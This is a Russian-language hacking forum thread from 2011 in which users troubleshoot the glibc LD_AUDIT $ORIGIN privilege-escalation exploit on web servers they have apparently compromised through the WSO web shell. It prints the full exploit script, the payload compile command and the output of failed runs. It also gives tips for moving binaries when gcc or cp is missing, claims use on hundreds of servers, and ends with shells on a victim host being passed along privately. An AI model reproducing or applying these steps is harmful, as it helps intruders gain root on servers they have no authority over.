Старый 20.11.2011, 08:52   #231
col
 
Регистрация: 17.03.2011
Сообщений: 180
Репутация: 8
По умолчанию

Цитата:
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
и всё, просто висит...
гы, id сделай

ну если что abftw выше
col вне форума   Ответить с цитированием
Старый 20.11.2011, 08:53   #232
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
Но тоже нет gcc...
Код:
ln /bin/ping ./exploit/target
срабатывает, но
Код:
$ cp exploit2 exploit 2>&1
sh: cp: command not found
уже нет...
из этого поста не видно, есть или нет gcc, видно, что нет cp

which gcc даст ответ, есть gcc или нет

1. Если нет gcc - компилируй на тачке с похожей конфигурацией и переноси сразу бинарник
2. Если нет cp (проверяется также - which cp) - ничто не мешает использовать сделать копию из php секции того же wso через eval

Код:
|Execution PHP-code

...
...
http://php.net/manual/ru/function.copy.php

PS: или через С, Perl & etc

полезную информацию о том, что есть и может пригодиться, сразу можно посмотреть в wso в секции [Sec. Info]:

...
...
Userful: gcc, cc, ld, make, php, perl, python, tar, gzip, bzip2, nc, locate

В общем думать, искать варианты

Цитата:
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
100% признак того, что просто запустился ping и сплойт не сработал, если бы сработало - то такой картинки не увидел бы

Цитата:
$ mkdir /tmp/exploit
$ ln /bin/ping /tmp/exploit/target
$ exec 3< /tmp/exploit/target
$ ls -l /proc/$$/fd/3
lr-x------ 1 www-data www-data 64 Nov 20 08:28 /proc/26599/fd/3 -> /tmp/exploit/target
$ rm -rf /tmp/exploit/
$ ls -l /proc/$$/fd/3
lr-x------ 1 www-data www-data 64 Nov 20 08:28 /proc/26599/fd/3 -> /tmp/exploit/target (deleted)
$ ls -l /tmp/exploit
-rw-r--r-- 1 www-data www-data 6901 Nov 20 08:28 /tmp/exploit
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
и всё, просто висит...
хм, и что тут удивляться, где компиляция сплойта в нужное место или копирование сплойта, скомпилированного на похожей машине в нужное место? Сам сделал пирожки, сам и кушай

Цитата:
Построчно в данном случае нельзя из-за $$
ls -l /proc/$$/fd/3 - вот здесь только используется, если брать первый пост из glibc-темы, вообще-то эти строчки там нафиг не нужны и их можно выкинуть, просто проверка, показывает, что происходит

Последний раз редактировалось Pashkela; 20.11.2011 в 09:26..
Pashkela вне форума   Ответить с цитированием
Старый 20.11.2011, 09:25   #233
col
 
Регистрация: 17.03.2011
Сообщений: 180
Репутация: 8
По умолчанию

пашкела не выспался?

Цитата:
где компиляция сплойта в нужное место или копирование сплойта
Цитата:
ls -l /tmp/exploit
-rw-r--r-- 1 www-data www-data 6901 Nov 20 08:28 /tmp/exploit
только он забыл +x поставить

Цитата:
100% признак того, что просто запустился ping и сплойт не сработал, если бы сработало - то такой картинки не увидел бы
а у меня это почти 100% признак того, что сплойт сработал (проверено на сотнях серверов) - несмотря на ворнинг пинга

просто стандартного приглашения консоли нет, некоторых вводит в заблуждение
col вне форума   Ответить с цитированием
Старый 20.11.2011, 09:30   #234
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
пашкела не выспался?

Цитата: где компиляция сплойта в нужное место или копирование сплойта

Цитата: ls -l /tmp/exploit
-rw-r--r-- 1 www-data www-data 6901 Nov 20 08:28 /tmp/exploit

только он забыл +x поставить
кхм? С помощью ls можно ставить +x на файлы? С помощью ls можно вообще что-то делать с файлами, кроме как отображать список? Пойду досыпать тогда наверное
Pashkela вне форума   Ответить с цитированием
Старый 20.11.2011, 09:31   #235
col
 
Регистрация: 17.03.2011
Сообщений: 180
Репутация: 8
По умолчанию

хинт: аплоад файла может происходить без помощи терминала
col вне форума   Ответить с цитированием
Старый 20.11.2011, 09:36   #236
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
Сообщение от col Посмотреть сообщение
хинт: аплоад файла может происходить без помощи терминала
жду ответа про ls, да снизойдет на меня озарение!
Pashkela вне форума   Ответить с цитированием
Старый 20.11.2011, 09:40   #237
col
 
Регистрация: 17.03.2011
Сообщений: 180
Репутация: 8
По умолчанию

очевидно ведь, что он просто показал что файл /tmp/exploit на месте
это так незаметно?

единственная его ошибка - забыл изменить права на файл
col вне форума   Ответить с цитированием
Старый 20.11.2011, 09:41   #238
dumb
 
Регистрация: 01.10.2011
Сообщений: 63
Репутация: 1
По умолчанию

Цитата:
Сообщение от Pashkela
из этого поста не видно, есть или нет gcc, видно, что нет cp
which gcc даст ответ, есть gcc или нет
пусто
Цитата:
$ which gcc
$
Цитата:
Сообщение от Pashkela
1. Если нет gcc - компилируй на тачке с похожей конфигурацией и переноси сразу бинарник
Ведь так и делаю =) писал об этом
Цитата:
Сообщение от dumb
файлы exploit2 и sh(из вашего башика) компилировал на локалке
ресурс
Цитата:
$ cat /etc/issue
Ubuntu 10.04.3 LTS \n \l
мой
Цитата:
dumb@host:~$ cat /etc/issue
Ubuntu 11.10 \n \l
Цитата:
Сообщение от Pashkela
Userful: gcc, cc, ld, make, php, perl, python, tar, gzip, bzip2, nc, locate
Цитата:
Userful: make, php, perl, python, tar, gzip, bzip2, nc, locate
И так, еще раз (по вашему башику, через бк):
Код:
$ cat glibc_nondebian.sh
#!/bin/sh
PWDEXP=.
mkdir $PWDEXP/exploit
ln /bin/ping $PWDEXP/exploit/target
exec 3< $PWDEXP/exploit/target
rm -rf $PWDEXP/exploit
cp exploit2 exploit
chmod 0755 exploit
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
ибо exploit2 и sh скомпилены и перенесены с локалки (ср здесь есть, не было на другом серве, вы посты перепутали)
Код:
$ ./glibc_nondebian.sh
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
            [-M mtu discovery hint] [-S sndbuf]
            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
$
увы...sh-суидник рута не получил...


-------

Цитата:
единственная его ошибка - забыл изменить права на файл
exploit2 и sh 755
dumb вне форума   Ответить с цитированием
Старый 20.11.2011, 09:50   #239
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
Сообщение от col Посмотреть сообщение
очевидно ведь, что он просто показал что файл /tmp/exploit на месте
это так незаметно?

единственная его ошибка - забыл изменить права на файл
издеваешься что ли?

Вот эта строчки ни о чем не говорят из первого поста glibc-темы:???

Код:
mkdir /tmp/exploit
...
...
...

gcc -w -fPIC -shared -o /tmp/exploit payload.c
естественно, даже не скомпилировав gcc -w -fPIC -shared -o /tmp/exploit payload.c, ls -l /tmp/exploit покажет его наличие
Pashkela вне форума   Ответить с цитированием
Старый 20.11.2011, 09:57   #240
dumb
 
Регистрация: 01.10.2011
Сообщений: 63
Репутация: 1
По умолчанию

Ладно парни, что то я вам уже мозг выносить с утра порпньше видимо начал...
отправил обоим в ЛС шеллы

если получится, тут прямо отпишите, что не так было...
dumb вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot